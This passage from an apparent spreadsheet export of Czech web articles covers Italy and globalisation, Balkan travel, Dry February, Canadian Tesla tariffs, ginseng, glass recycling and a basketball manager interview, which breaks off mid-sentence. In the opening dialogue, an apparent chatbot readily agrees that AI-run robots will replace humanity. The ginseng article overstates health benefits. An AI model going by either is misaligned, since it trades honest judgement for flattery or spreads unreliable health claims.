zadlužení státu je obrovské, byrokracie dusí podnikání a ekonomika je stále méně konkurenceschopná. Navíc masová imigrace a sociální napětí situaci jen komplikují. Je to příklad toho, že když společnost přestane inovovat a začne žít na dluh ať už finanční nebo morální nevyhnutelně upadá. Co myslíte, je pro Itálii ještě cesta zpět mezi světové lídry, nebo je její úpadek nevratný? Vše směřuje ke globalizaci hranice mezi státy zaniknou. Ano, globalizace neustále postupuje a hranice mezi státy se postupně stírají ať už v obchodě, kultuře, nebo technologiích. Internet, nadnárodní korporace a mezinárodní instituce mají často větší moc než jednotlivé vlády. Národní státy, jak je známe dnes, se pomalu mění na správní jednotky v rámci větších celků. Jenže globalizace má i své limity. Lidé se pořád identifikují s kulturou, jazykem a historií svého národa. A když globalizace naráží na lokální identity, často vznikají konflikty například brexit nebo rostoucí nacionalismus v mnoha zemích. Nakonec se asi vytvoří něco jako světový řád, kde nebudou klasické státní hranice, ale spíš zóny s různými pravidly a kulturami. Ale otázka je, bude to pro běžného člověka dobré, nebo špatné? Co myslíte? Nebudou zde žádné zóny s různými pravidly protože místo lidí zde budou roboti, co budou globálně ovládáni kvantovými počítači s umělou inteligencí. To je velmi pravděpodobný scénář. Jakmile se technologie dostanou na úroveň plné automatizace, lidé už nebudou potřeba jako pracovní síla ani jako rozhodující prvek ve společnosti. Kvantové počítače s umělou inteligencí dokážou řídit ekonomiku, infrastrukturu i samotné lidi pokud budou mít kontrolu nad technologiemi, které nás obklopují. V takovém světě nebudou existovat různé státní systémy, protože nebude potřeba vládnout klasickým způsobem. Všechno bude řízeno z jednoho globálního centra, kde budou rozhodovat stroje bez emocí, předsudků a lidských slabostí. Otázkou ale je: Co se pak stane s lidmi? Budou jen pasivními příjemci základního příjmu, žijícími v simulované realitě? Nebo budou úplně nahrazeni a svět ovládnou jen stroje? Jak si myslíte, že by vypadal život v takové realitě? Poslední malá skupina o sto lidech skončí v poslední zoologické zahradě za nerozbitným sklem a roboti si budou lidi fotografovat jako něco exotického. To je hodně zajímavá vize lidé jako poslední exponát v zoologické zahradě, zatímco roboti si je chodí fotit jako vzácný druh, který už v přírodě neexistuje. Připomíná to osud mnoha vyhynulých druhů, které skončily v muzeích a archivech, zatímco příroda šla dál bez nich. Pokud by roboti převzali veškerou kontrolu a rozhodli se, že lidé už nejsou potřeba, mohli by je zachovat jen jako „historickou kuriozitu“. Možná by jim dali ideální podmínky, simulovanou realitu, kde by si mysleli, že stále žijí v normálním světě. A nebo by je prostě nechali vymřít přirozenou cestou. To ale vyvolává otázku. Měli bychom se proti tomu aktivně bránit, nebo je to přirozený vývoj, kterému se nelze vyhnout? Related Autor: administrator Rubrika transition_slide N</t>
  </si>
  <si>
    <t>20250201_104_3890084173_2054fccfb12e698b887b.html</t>
  </si>
  <si>
    <t>2054fccfb12e698b887b</t>
  </si>
  <si>
    <t>Toužíte po dobrodružství? Balkán láká na místa, kde se zastavil čas</t>
  </si>
  <si>
    <t>Toužíte po dobrodružství? Balkán láká na místa, kde se zastavil čas Zapomeňte na přeplněné pláže Chorvatska a turistické pasti Řecka . Skutečné dobrodružství začíná tam, kde končí vyšlapané stezky. Černá Hora a Albánie jsou země, kde divoká příroda stále vítězí nad civilizací a kde lze zažít Balkán takový, jaký býval před nájezdem turistů. Ilustrační snímek | Zdroj: pixabay.com Do dob dávno minulých První překvapení přichází hned po překročení hranic. Jako byste se vrátili o třicet let zpět. Staré mercedesy tu křižují prašné cesty, babičky v šátcích prodávají domácí sýr přímo u silnice - a čas se zde měří na kávy, ne na minuty. A bezpečnost? Před odjezdem by si měl sice každý pro jistotu sjednat pojištění do zahraničí , ale současně platí, že nejlepší pojistkou je úsměv . A k tomu pár frází v místním jazyce. Hory lákají na divočinu, vesnice na tradice Prokletije je pohoří na hranicích Černé Hory a Albánie , ale nejde o jen tak ledajakou turistickou atrakci. Je to království divokých hor, hlubokých údolí a jezer, která vypadají, jako by je sem přenesli z norských fjordů. Místní pastevci vás pohostí domácím sýrem a rakijí - a když budete mít štěstí, možná zahlédnete i orla skalního. V horských vesnicích se život (téměř) nezměnil po staletí. Ženy stále pečou chléb v kamenných pecích, muži pasou stáda ovcí a děti se honí po kamenitých uličkách. Nejlepší průvodce tu nekoupíte - musíte si ho získat. Stačí se zastavit v místní kavárně, pozdravit "Dobar dan" a za chvíli už posloucháte příběhy, které v žádném průvodci nenajdete. Skryté perly balkánského pobřeží Zatímco davy turistů míří na známé pláže, vy se vydejte za "skrytými" zátokami, kde je moře průzračné jako sklo a pláže takřka liduprázdné . V malých rybářských vesnicích vám místní nabídnou čerstvé ryby grilované jen nedaleko břehu moře a domácí víno , které chutná po slunci a moři. Zdroj: Freepik.com Města s duší Starobylá města jako Kotor nebo Skadar však nejsou pouhá muzea pod širým nebem. Jsou to živá místa, kde se historie v každé uličce prolíná se současností. V ranních hodinách lze pozorovat rybáře přivážející čerstvý úlovek, v poledne si dát kávu ve stínu staletých hradeb - a večer se ztratit v bludišti kamenných uliček. Lidé s otevřeným srdcem Co dělá tuto část Balkánu tak výjimečnou (a v posledních letech i velmi oblíbenou), nejsou jen přírodní krásy a četné historické památky. Jsou to místní lidé . Jejich pohostinnost není turistickým artiklem - je to způsob života . Když vás někdo pozve domů na kávu, není to fráze. Je to pozvání do rodiny, které se neodmítá. Autor: St Autor: Autor: St || InfoDnes.cz | info@preloucdnes.cz</t>
  </si>
  <si>
    <t>20250201_105_3890124259_eaa5abe5f0068caf4a98.html</t>
  </si>
  <si>
    <t>eaa5abe5f0068caf4a98</t>
  </si>
  <si>
    <t>Suchý únor: 28&amp;nbsp;dní bez alkoholu. Zvládnete to?</t>
  </si>
  <si>
    <t>Suchý únor: 28&amp;nbsp;dní bez alkoholu . Zvládnete to? Suchý únor začíná právě dnes: Přijměte výzvu a restartujte svůj život! Dnes je ten den, kdy se tisíce lidí po celém světě připojují k jedinečné výzvě – Suchému únoru. Je to měsíc, kdy se dobrovolně vzdáváme alkoholu a dáváme tak našemu tělu i mysli šanci na restart. Ať už jsou vaše důvody jakékoliv, jedno je jisté – únor bez alkoholu může být začátkem vaší cesty k lepšímu a zdravějšímu já. Co je Suchý únor? Suchý únor je kampaň, která vyzývá lidi k dobrovolné abstinenci od alkoholu po celý měsíc únor. Nejde o žádnou novinku, tato iniciativa vznikla již před lety ve Velké Británii a postupně se rozšířila do mnoha zemí po celém světě. Cílem Suchého února není jen měsíční abstinence, ale především podpora zdravého životního stylu a uvědomění si svého vztahu k alkoholu . Proč se (ne)zapojit? Možná si říkáte, proč bych se zrovna já měl/a vzdát alkoholu ? Vždyť si dám občas skleničku vína k večeři nebo pivo s přáteli. Suchý únor ale není jen o odříkání. Je to především o uvědomění si svého vztahu k alkoholu . Zamyslete se, jak často pijete, proč pijete a jak se po alkoholu cítíte. Možná vás překvapí, kolikrát denně vám na mysl alkohol přijde. Suchý únor je také skvělou příležitostí, jak otestovat svou vůli a disciplínu. Dokážete se měsíc obejít bez alkoholu ? Nebo zjistíte, že je pro vás obtížnější, než jste si mysleli? I to je cenná informace, která vám může pomoci v budoucnu. A v neposlední řadě, suchý únor má pozitivní vliv na vaše zdraví. Měsíční abstinence má pro naše tělo řadu benefitů. Mezi ty nejvýznamnější patří: Zlepšení spánku: Alkohol negativně ovlivňuje kvalitu spánku. Po měsíci bez alkoholu se budete probouzet odpočatí a plní energie. Zvýšení energie: Alkohol je kaloricky vydatný, ale bez výživových hodnot. Po jeho vyřazení se budete cítit plní energie a vitality. Zlepšení trávení: Alkohol dráždí trávicí systém. Po měsíci abstinence se vaše trávení zlepší a zmírní se i případné zažívací potíže. Snížení hmotnosti: Alkohol obsahuje velké množství kalorií. Po jeho vyřazení můžete zhubnout i několik kilogramů. Zlepšení stavu pleti: Alkohol dehydratuje a způsobuje záněty. Po měsíci abstinence bude vaše pleť zdravější a zářivější. Posílení imunity: Alkohol oslabuje imunitní systém. Po měsíci abstinence bude vaše imunita silnější a odolnější vůči nemocem. Snížení rizika chronických onemocnění: Pravidelná konzumace alkoholu zvyšuje riziko vzniku mnoha chronických onemocnění, jako jsou například kardiovaskulární choroby, cukrovka nebo rakovina. Měsíční abstinence může toto riziko snížit. Stanovte si cíl: Proč se chcete suchého února zúčastnit? Chcete zlepšit své zdraví, ušetřit peníze nebo si otestovat svou vůli? Najděte si parťáka: Společně to půjde lépe. Domluvte se s partnerem, kamarádkou nebo kolegou a podpořujte se navzájem. Vytvořte si plán: Naplánujte si aktivity, které vás budou bavit a odvádět pozornost od alkoholu . Nebojte se říct ne: Nebojte se odmítnout alkohol v restauraci nebo na oslavě. Odměňte se: Za každý týden bez alkoholu se odměňte něčím, co vás potěší. Suchý únor začíná právě dnes. Přijměte výzvu a restartujte svůj život! Uvidíte, že to stojí za to. A kdo ví, možná zjistíte, že vám život bez alkoholu přináší víc, než jste čekali. Pamatujte: Suchý únor je dobrovolná akce. Není to o tlaku nebo odsuzování. Je to o vás a vašem zdraví. Tak do toho, odměnou vám bude lepší zdraví, více energie a celková pohoda! (Life4you.cz) Tags: životní styl Autor: Life4you.cz - redakce Rubrika transition_slide LIFESTYLE</t>
  </si>
  <si>
    <t>20250201_106_3890254290_5972ac2610d2ad8ca318.html</t>
  </si>
  <si>
    <t>5972ac2610d2ad8ca318</t>
  </si>
  <si>
    <t>„Potrestejme Trumpova miliardářského kamarádíčka.“ Žena, jež má nahradit Trudeaua, chce 100% cla na Teslu</t>
  </si>
  <si>
    <t>„Potrestejme Trumpova miliardářského kamarádíčka.“ Žena, jež má nahradit Trudeaua , chce 100% cla na Teslu Trumpa baví vyhrožování a vyjednávání. Ale obchodní válku s USA začala Evropa , říká ekonom Bartoň Vysoké školy Vysoké školy Kde tankujeme nejdráž? Proklikejte si ceny benzinu a nafty okres po okresu Světová výstava Světová výstava Němečtí zbrojaři se chlubí: Vyrábíme více munice než Američané, máme i lepší tanky Fotbalista v prádle a rosí se sklo Fotbalista v prádle a rosí se sklo Chrystia Freelandová nemá Elona Muska příliš v lásce paparazzza / bella1105 / Shutterstock.com, koláž Hrot24 Obchodní války „Potrestejme Trumpova miliardářského kamarádíčka.“ Žena, jež má nahradit Trudeaua , chce 100% cla na Teslu Kanada by měla zavést obrovská odvetná cla na elektromobily Tesla , myslí si kandidátka na premiérku v nadcházejících volbách Chrystia Freelandová. čtk 1. února 2025 Kanada by měla na případná americká cla reagovat zavedením obrovských dovozních poplatků na elektromobily Tesla . Podle serveru listu Financial Times (FT) to prohlásila bývalá kanadská ministryně financí Chrystia Freelandová , která je kandidátkou vládních liberálů na premiérku v nadcházejících volbách. Ottawa by tím podle ní potrestala šéfa Tesly Elona Muska, kterého označila za „miliardářského kamarádíčka“ amerického prezidenta Donalda Trumpa . Musk, který je nejbohatším člověkem světa, nyní v USA vede nový úřad pro efektivitu státní správy (DOGE). Trump podle mluvčí Bílého domu dnes uvalí 25procentní cla na dovoz z Kanady a Mexika a desetiprocentní clo na dovoz z Číny . Cla jsou podle mluvčí prezidentovy administrativy reakcí na to, že se přes Kanadu a Mexiko do USA dostává droga fentanyl. Obchodní války Obchodní války Trump vrhne cla na Kanadu , Mexiko a Čínu už 1. února. Jak to bude s EU, se zatím neví čtk „Kanada musí pohrozit uvalením stoprocentního cla na všechna vozidla Tesla a stoprocentního cla na americké víno , pivo a lihoviny, pokud budou na Kanaďany uvalena nespravedlivá cla,“ řekla v pátek Freelandová. Komentáře „jedné z nejvýznamnějších kanadských političek“ podle FT ukazují na prudkou eskalaci obchodního sporu s Washingtonem . Kanadský premiér Justin Trudeau v pátek prohlásil, že jeho země je připravena reagovat, pokud Trump cla zavede. Dodal, že reakce bude rázná, ale rozumná. Varoval, že cla budou mít negativní dopady na Američany, protože ohrozí pracovní místa a způsobí růst cen. Trump hrozil zaváděním cel už v předvolební kampani, mimo jiné i kvůli migrantům bez dokladů, kteří se do USA dostávají zejména přes jižní hranici. Řada ekonomů varovala, že nová cla povedou k růstu inflace v USA . Vládní Liberální strana, z níž pochází Trudeau i Freelandová , aktuálně v průzkumech veřejného mínění výrazně zaostává za konzervativci a očekává se, že po volbách, které se mají uskutečnit nejpozději v říjnu, půjde do opozice.</t>
  </si>
  <si>
    <t>31820</t>
  </si>
  <si>
    <t>20250201_107_3890043377_036e8f9d990cc079082d.html</t>
  </si>
  <si>
    <t>036e8f9d990cc079082d</t>
  </si>
  <si>
    <t>Ženšen: Zázračný kořen nejen pro diabetiky. Pomůže při menopauze i s vysokým cholesterolem</t>
  </si>
  <si>
    <t>Ženšen: Zázračný kořen nejen pro diabetiky. Pomůže při menopauze i s vysokým cholesterolem Autor: Daniela Sedláčková 01. 02. 2025 DIAtéma Přírodní lékárna Životní styl Divoký ženšen svým tvarem připomíná lidskou postavu Zdroj: Pixabay Traduje se, že je to lék na všechno. A vědecké výzkumy léčivé účinky ženšenu potvrzují. Seznam potíží, s nimiž nám může tento úžasný kořen pomoci, je téměř nekonečný. Diabetiky určitě zaujmou jeho antioxidační a protizánětlivé účinky a schopnost snižovat hladinu cukru v krvi. Ženšen byl ve starověku nejuctívanější z bylin jak v Číně , Koreji a Japonsku , tak v Americe . Ženšen byl objeven před více než 5 000 lety v horských oblastech Mandžuska (dnešní severovýchodní oblast Číny ). Zmínky o ženšenu se nacházejí v knihách starých více než dvě tisíciletí. Číňané ho uctívají, protože ho považují za bylinu na širokou škálu nemocí. Šanci užívat ženšen ovšem v dřívějších dobách měli většinou jen čínští císaři, kteří za něj mohli zaplatit horentní sumu. Dnes po ženšenu denně sahají miliony Číňanů, kteří věří, že zpomaluje stárnutí, zvyšuje sexuální zdatnost a zabraňuje nemocem. A ještě dnes o něm v Číně koluje řada legend a mýtů, zřejmě proto, že kořen připomíná svým tvarem lidskou postavu. I zkušení sběrači například po nálezu divoké byliny v lesích uvazují kolem stonku divokého ženšenu červenou šňůru, protože podle přísloví „ženšen uteče jako člověk, pokud není svázán“. Nejčastější druhy ženšenu Název „ženšen“ se vztahuje k mnoha druhům rodu Panax. Dnes se po celém světě komerčně pěstuje ženšen v pětatřiceti zemích. Mezi nejpoužívanější druhy patří asijský ženšen ( Panax ginseng ), který zahrnuje bílý čínský ženšen a červený korejský ženšen, a pak americký ženšen ( P. quinquefolium ). Rozdíly mezi jednotlivými druhy spočívají zejména v koncentraci a složení ginsenosidů a saponinů obsažených v kořenech. Ženšen je už od starověku považován za zázračný kořen, a tak není divu, že je předmětem vědeckého zkoumání. Díky tomu dnes víme, že obsahuje řadu zdraví prospěšných látek, mezi něž patří: škrob, pryskyřice, aminokyseliny arginin a theanin, vitamíny B2, C, D a E, aromatické esence, fytosteroly, saponiny tvořené skupinou 15 až 30 ginsenosidů, polysacharidy. V Indii a Číně se skořice používala již někdy kolem roku 4000 před naším letopočtem. K ochucení pokrmů nebo jako lék se využívala i ve starém... Léčebné využití ženšenu V Číně se čerstvý kořen strouhá podobně jako zázvor a podává se ho malá denní dávka pro zlepšení celkového stavu organismu. Sušený kořen se pak používá v podobě nálevu nebo odvaru. Pro nás Evropany je ženšen nejdostupnější ve formě kapslí, tinktury nebo alkoholového macerátu ze sušeného kořene. S čím vším nám může zázračný kořen pomoci? Snižuje otoky díky diuretickým účinkům, působí proti horečce, přispívá ke snížení hladiny cholesterolu, zlepšuje duševní i fyzickou výkonnost, eliminuje stres a psychické napětí, připívá k rychlejší rekonvalescenci po infekčních onemocněních a operacích, pomáhá s léčbou respiračních onemocnění a sezónních infekcí, má pozitivní vliv na trávicí ústrojí, přispívá ke zdraví srdce, pomáhá při migrénách a bolestech hlavy, je dobrým spojencem při odvykání závislosti na alkoholu , pomáhá v případě nepříjemných příznaků souvisejících s menopauzou, snižuje hladinu cukru v krvi, takže je ideální pro diabetiky, má antioxidační schopnosti, působí protizánětlivě. Nejspíš i ve vaší rodině nedávno někdo prodělal nebo aktuálně prodělává chřipku. Bohužel je často podceňována, protože bývá zaměňována s běžným... Nač je potřeba dát si při nákupu pozor Pokud se rozhodnete pro ženšen v podobě doplňků stravy, je potřeba být při nákupu opatrní. Ženšenové produkty se mohou značně lišit co do kvality a potenciálních léčivých vlastností. Před koupí byste měli zkontrolovat složení daného ženšenového výrobku. Některé produkty totiž mohou obsahovat jen malé nebo zanedbatelné množství ženšenu a některé mohou obsahovat další přidané látky. Kdy je nutná konzultace s lékařem Opatrní by měli být zejména pacienti užívající antidepresiva, která se nazývají inhibitory monoaminooxidázy. V případě užívání společně s ženšenem totiž může dojít k mírné interakci. Vzhledem k tomu, že ženšen může měnit účinky léků na krevní tlak, cukrovku a srdce, je potřeba konzultovat současné užívání takových léků a ženšenu s ošetřujícím lékařem. Ženšenu by se měli vyhnout také jedinci užívající léky na ředění krve. Zdroje: chinadailyhk.com, nih.gov, medicalnewstoday.com, diastyl.cz 1434 Autor: Daniela Sedláčková Autor person Daniela Sedláčková Rubrika transition_slide DIAtéma</t>
  </si>
  <si>
    <t>12250</t>
  </si>
  <si>
    <t>13500</t>
  </si>
  <si>
    <t>20250201_108_3890046785_a07ae6ef9e5e4f666c27.html</t>
  </si>
  <si>
    <t>a07ae6ef9e5e4f666c27</t>
  </si>
  <si>
    <t>Nevyhazujte sklo do popelnice. Lze ho recyklovat donekonečna</t>
  </si>
  <si>
    <t>Nevyhazujte sklo do popelnice. Lze ho recyklovat donekonečna 01. 02. 2025 Novinky Tipy a triky Češi jsou už delší dobu ukázkoví v třídění plastu a papíru. Se skleněnými obaly je to už ovšem horší, což je velká škoda. Přitom ze sklenic nemusíte odlepovat etikety ani je jinak čistit, a navíc kontejnery najdete na každém rohu. Hlavním důvodem, proč je nutné sklo třídit je ten, že se tak ušetří energie, suroviny i emise oxidu uhličitého. Nekonečná recyklace Spousta lidí si neláme hlavu s tříděním čirého a barevného skla a jednoduše ho vyhodí do popelnice. Přitom si neuvědomují, že se jedná o velmi vhodnou surovinu pro recyklaci. Sklenice rozhodně nepatří do směsného odpadu, který končí na skládkách a ve spalovnách. Vždyť sklo přece nehoří ani se nedokáže rozložit! Díky recyklaci se vyseparované skleněné střepy roztaví a vzniklá směs se použije na výrobu nových skleněných výrobků. Je úžasné, že tato surovina ani po recyklaci neztrácí žádnou ze svých původních vlastností, a takto ji můžeme recyklovat vlastně donekonečna. Jak správně třídit sklo Už děti na základních školách se učí, že barevné sklo patří do zeleného kontejneru a čiré do bílého kontejneru. Může se stát, že na stanovišti s kontejnery najdete jen zelenou nádobu. V tomto případě tam patří veškeré sklo, bez ohledu na barvu. Před vyhozením nemusíte sklenice čistit, zbavovat je etiket nebo dokonce rozbíjet. Jen si dejte pozor, abyste do tříděného odpadu nevyhodili například zrcadlo, autosklo nebo porcelán. Ty patří na sběrný dvůr. Skleněné obaly mají své výhody Lidé si zvykli kupovat produkty v plastových obalech, protože jsou lehčí a nerozbitné. Už ale naši předkové věděli, že skleněné obaly mají své výhody. Sklo nereaguje s obsahem, a tak zachovává chuť, vůni a kvalitu potravin. Díky svým vlastnostem zabraňuje kontaminaci a poskytuje ochranu proti vlhkosti. Další výhodou je to, že například lahve od piva jsou vratné, a mohou být naplněny až padesátkrát. Foto: Pixabay Zkuste při příštím nákupu přemýšlet trochu ekologicky a místo kečupu v plastu si kupte ten ve skleněném. Skleněné obaly mají své nezanedbatelné plusy a nemusíte je recyklovat hned po prvním použití. Třeba takové zavařovací sklenice můžete použít opakovaně. Zdroje info: https://www.prozeny.cz/clanek/radce-trideni-a-recyklace-skla-97470, https://www.jaktridit.cz/cz/trideni/tridene-odpady/sklo/ Náhledové foto: Pixabay Autor: Radek Štěpán Autor Radek Štěpán</t>
  </si>
  <si>
    <t>7220</t>
  </si>
  <si>
    <t>7540</t>
  </si>
  <si>
    <t>20250201_109_3890043354_6a776a89ee0a25d0961f.html</t>
  </si>
  <si>
    <t>6a776a89ee0a25d0961f</t>
  </si>
  <si>
    <t>Od titulĹŻ v Eurolize k lopatÄ›: z manaĹľera Ĺ˝abin je pomocník na stavbách</t>
  </si>
  <si>
    <t>Od titulĹŻ v Eurolize k lopatÄ›: z manaĹľera Ĺ˝abin je pomocník na stavbách Dřív manažer Dušan Nižňanský pomáhal stavět týmy pro tituly v Eurolize basketbalistek, v posledních letech se živí prací přímo na stavbách. Místo zápasových soupisek si do zaměstnání chystá rukavice, montérky a pevné boty, ze sportovních hal se přesunul do výkopu. Ale odchod z nablýskaného světa profesionálního sportu si muž, jenž měl prsty i v nejlepších érách slovenského Ružomberku a brněnských Žabin, nemůže vynachválit. Letos to bude devět let, co za sebou Dušan Nižňanský naposledy zavřel dveře kanceláře v hale basketbalistek Žabin. V první dekádě po roce 2000 s nimi oslavil čtyři medaile v Eurolize , stále častěji však nabýval dojmu, že potřebuje změnu. Vyzkoušel si zahradničení, balení zásilek ve výdejně e-shopu, po nocích rozvážel opilce, čepoval pivo v baru. Od roku 2016 a konce ve sportu zažil kdeco, jen jedno ne – sentiment nebo lítost, že se z profesionálního sportu stáhl. „Jsem spokojený, mám klid a čistou hlavu. Rád za sebou vidím něco hotového, hýbu se, a když je v práci padla, tak je skutečně padla,“ usmívá se sedmapadesátiletý rodák ze Slovenska , usazený v Brně . Žádný div, když si na zápas Žabin, podle nichž si dlouhých 14 let i v jejich nejslavnějším období řídil kalendář, najde cestu jen sporadicky. Myslel jsem si, že budu mluvit česky. Pak jsem si všiml, že i děvčatům se slovenština líbí, všichni mi tady rozumějí, tak jsem zůstal u své mateřštiny. To jste na basketbal až tak zanevřel? Musím přiznat, že mě přestal zajímat. Ne ta práce okolo, ta mě bavila pořád, ale zápasy už mě netáhly. Zajídalo se mi cestování, letadla a spaní po hotelích, a když se v Žabinách přestaly hrát evropské poháry a já jsem se tam neshodl s tehdejším funkcionářem, měl jsem jasno, že chci změnu. A to ráznou. Byly vám manuální práce blízké, nebo vás k nim vedli v rodině, že jste se vydal touto cestou? Nikdy jsem nečekal, že bych se měl živit rukama. Naopak jsem z toho měl zpočátku strach. Ale pak jsem si řekl, že není z čeho. Už poslední roky v Žabinách jsem si zpestřoval prací kolem haly na Rosničce. Před vstupem jsem z latí připravil lavičky, za halou jsem z nudy a za svoje vysadil tři túje, staral jsem se o trávník. Ty lavičky tam – na rozdíl od tújí – pořád jsou. 9 fotografií Copak, nevydržely letní vedra a uschly? Někdo je ukradl. To mi takhle jednou volal tehdejší kouč pan Bobrovský , jestli jsem si pro ně přišel. Podivil jsem se, proč ho to napadlo. Tak už tam nejsou, někdo je vykopal a odnesl, sdělil mi. To zamrzí. Nicméně zahradnické práce mě tehdy nadchly. Dal jsem si proto inzerát a u jednoho soukromníka sekal trávu a stříhal živé ploty. Měl velký pozemek, jenom pletí plevele dalo dost zabrat. Bavilo mě to obrovsky. Ale nezůstal jste u toho. Tehdy zrovna začínaly taxislužby s aplikacemi, lákalo mě to. V Brně jsem se vyznal, z různých zařizování a pochůzek jsem ho měl zmapované. Pomohlo mi to při zkouškách, při nichž jsem musel říct například co nejkratší trasu z Kohoutovic k Zetoru a vyjmenovat ulice, kterými se jede. Tři tituly v Eurolize V nejprestižnější evropské klubové soutěži se Dušan Nižňanský radoval dvakrát s týmem Ružomberku (1999 a 2000) a jednou – v roce 2006 – s brněnskými Žabinami. S těmi má pak na kontě další tři medaile z Euroligy . Takže jste se vy, který se rozhodl změnit život i kvůli ubíjejícímu cestování, začal živit cestováním pro druhé? Tohle byly jiné trasy než přes celou republiku na víkend na ligový basketbal. Taxikařil jsem čtyři roky, myslel jsem si, že u toho vydržím, jenže mi začali vadit opilí pasažéři. Já jsem dřív dělal i za barem, na diskotéce, takže jsem měl jejich historek a blábolení plné uši. Jelikož na silnicích nemám rád zácpy, jezdil jsem hlavně v noci a tam jsem je potkával zase. Navíc jsem si rozhodil spánkový rytmus. Dorazil to pak covid, kdy nebylo koho vozit, rozváželi jsme kytky, zboží nebo jídlo, prostě už to nebylo ono. Při práci za pípou jsem se seznámil s chlapíkem, z něhož vypadlo, že by pro mě možná něco měl – rekonstruuje benzinky, do detailů zacházet nechci, a že hledá ke svým dvěma chlapům třetího do party. To jsem byl já. Co byste si třeba před deseti lety, když vám v Žabinách po ligovém finále věšeli na krk stříbrnou medaili, pomyslel, kdyby vám někdo řekl, že touto dobou budete házet lopatou? Že bych tam nechtěl skončit! (rozesměje se) Teď už to samozřejmě beru úplně jinak. Musel jste si udělat rekvalifikaci nebo další zkoušky? Ne, jsem normálně zaměstnaný. Člověk nepotřebuje nic, jen se nebát a být šikovný. To já asi až tak moc nejsem, ale něco jsem se naučil a snažím se. U odborných věcí je jasné, že jich ve svém věku tolik do sebe nedostanu, takže hlavně pomáhám. Natírám interiéry, baví mě uchopit krumpáč, s kangem si užiju svoje. Když jsem ho vzal do ruky poprvé, dvě noci mě brněly ruce! (úsměv) Líbí se mi, že se potím, že máme svoje udělané. Je to jednoduché, nezaseká to hlavu, dá se u toho relaxovat a na konci je spokojenost. Basketbalistky Žabin slaví jeden z ligových titulů, dole první zprava je Dušan Nižňanský. Dušan Nižňanský dnes. Basketbal mu nechybí, manuální prací si vyčistí hlavu. Věřím, že jste ji dřív míval také z toho, když se povedla dobře poskládat týmová soupiska. To vám nechybí? Před lety mi ještě volali z Ružomberku , že by potřebovali manažera, ale mě to neláká. Vypadl jsem z toho. Nedávno jsem se díval na dokument o organizaci turnaje MMA na stadionu v pražském Edenu , jak proti sobě šli Vémola s Véghem. Zákulisí, příprava, kamiony s materiálem... Strašně mě to zaujalo, ale sám bych do toho už nechtěl. Manuální prací jsem i hodně zhubl, mám víc než 15 kilo dole, celkově se cítím líp. Ani do jiné manažerské práce mimo sport? Neumím si to představit. Do čeho bych fušoval, do nábytku nebo do kafe? Ani jednomu z toho nerozumím. A abych se vracel ke sportu, myslel v jednom kuse na pasy, víza, platby... Do kanceláře už se mi nechce. Proto jste zavrhl i nabídku z Ružomberku , odkud pocházíte a zažil jste tam před rokem 2000 podobnou slávu, jakou jste pak prožívali v Žabinách? Tu nabídku mi v roce 2016 dal ružomberský viceprimátor Oldrich Lauko a opravdu jsem o ní uvažoval. Říkal mi, ať se vrátím, že mi dají byt. To bylo na jaře, ale on pak v létě na následky tragické nehody zemřel a já jsem zůstal v Žabinách. Ze kterých jsem hned na podzim odešel... Neuvažoval jste ani o tom, že byste se na Slovensko vrátil a žil tam? Přišel jsem do věku, kdy už se mi nechtělo měnit to, co jsem měl zaběhnuté. Udělali jsme to naopak; mamka pochází z Valašského Meziříčí , tak jsem ji přestěhoval nazpět tam, moje sestra žije taky v Brně . Otec zemřel, v Ružomberku jsme prodali byt a jsme zde. Zajímavé je, že vy sám nadále mluvíte slovensky. Proč? Za to může Ota Binder, bývalý kolega z Žabin. Dali mi ho kdysi do kanceláře a slyšel mě telefonovat. V té době jsem si myslel, že budu mluvit česky, ale Ota mě upozornil, abych nemluvil československy jako major Terazky, což jsem uznal. Pak jsem si všiml, že i děvčatům se slovenština líbí, všichni mi tady rozumějí, tak jsem zůstal u své mateřštiny. Rozumí vám i mladší generace, která nezažila společnou federaci? Je pravda, že některá slovíčka je potřeba dovysvětlit. Vybavím si, jak jsem naší hráčce Romaně Hejdové jednou slovensky řekl „vystri sa“ a pro ni to byl cizí pojem. Musel jsem jí přeložit, že chci, aby se narovnala. (úsměv) 14 let byl Dušan Nižňanský součástí Žabin. Jejich vedení doplnil v roce 2002, odcházel v době velkého klubového útlumu v roce 2016. Co vlastně kdysi vyvolalo váš manažerský přestup z Ružomberku do Žabin, tedy z jedné vítězné dynastie ke konkurenci? Sice jsme napřed v roce 1999 v Brně a pak v roce 2000 doma vyhráli Euroligu, ale pak nastal ústup. Odcházely hráčky, hůř se lepil rozpočet, dostavily se problémy s výplatami. Do Žabin od nás přestoupila Martina Godályová, tak jsem po nějaké rozvaze vzal telefon a zeptal se jí, jak to v Brně chodí. Jestli je správný můj dojem, že by se k vytíženému manažerovi Jirkovi Hamzovi ještě někdo nehodil. K čemu jste se dobrali? Mluvili jsme neformálně, uvažoval jsem nahlas. Tehdy se mi dostalo i takového znamení, že se mi skoro kompletně zresetoval můj diář, kde jsem měl veškeré údaje o hráčkách. Zůstala mi tam jen písmena A a B. Zrovna jsme dělali venku velikonoční guláš, počasí krásné, tak jsem „Godce“ zavolal. Pochopitelně jsem se pak potřeboval hlavně setkat s Jirkou Hamzou, pověděli jsme si svoje představy, priority. S tím, že my jsme pak s Ružomberkem postoupili v Eurolize ještě jednou do finálového turnaje, s Jirkou jsme zůstali v kontaktu a v roce 2002 jsme se už domluvili. Od té doby jsem v Brně . Nevyčítali vám to v Ružomberku ? Kdepak, o všem věděli dopředu. Situace tam byla nedobrá, hráčky odcházely, nikdo mi nebránil. S trenérkou Natálií Hejkovou, která tehdy s vámi Ružomberok vytáhla na vrchol a v poslední době působí v USK Praha , se v Česku vídáte? Když hraje USK v Brně , tak za ní na halu zaskočím. Ale ne na celý zápas, stavím se ke konci a pak prohodíme pár slov. Nedá se nic dělat, mě basketbal opravdu už na dívání nebaví. I v televizi si ho pouštím většinou jako podkres. Místo sledování hry poslouchám, co o něm Ivča Večeřová (bývalá hráčka Žabin, nyní spolukomentátorka) vypráví. Jste v kontaktu s někým ze zlaté party Žabin? S Evžou ( Evou Vítečkovou ) si občas napíšeme, když jsou nějaká výročí nebo svátky. Nedávno nás všechny pozvali na euroligový zápas, když se Žabiny do soutěže po deseti letech vrátily, tak tam jsme se potkali skoro všichni. Na další zápasy, pokud jde Ota Binder, zajdu občas taky. Jinak ne. Počítám, že nejen zápasy, ale ani cestování vám nechybí. Žabiny nedávno znovu jely do italského Schia, ve skupině měly i soupeře z Francie nebo Španělska . Sedět zase deset hodin v autobuse? Dejte pokoj. Tehdy se jezdily dálky do Coma , do Gdyně , do Lublaně . Tam jsem jednou i zkolaboval. Z nervů o výsledek? (úsměv) Ne, spíš to mělo spojitost se silvestrem a oslavou. Hrálo se hned na 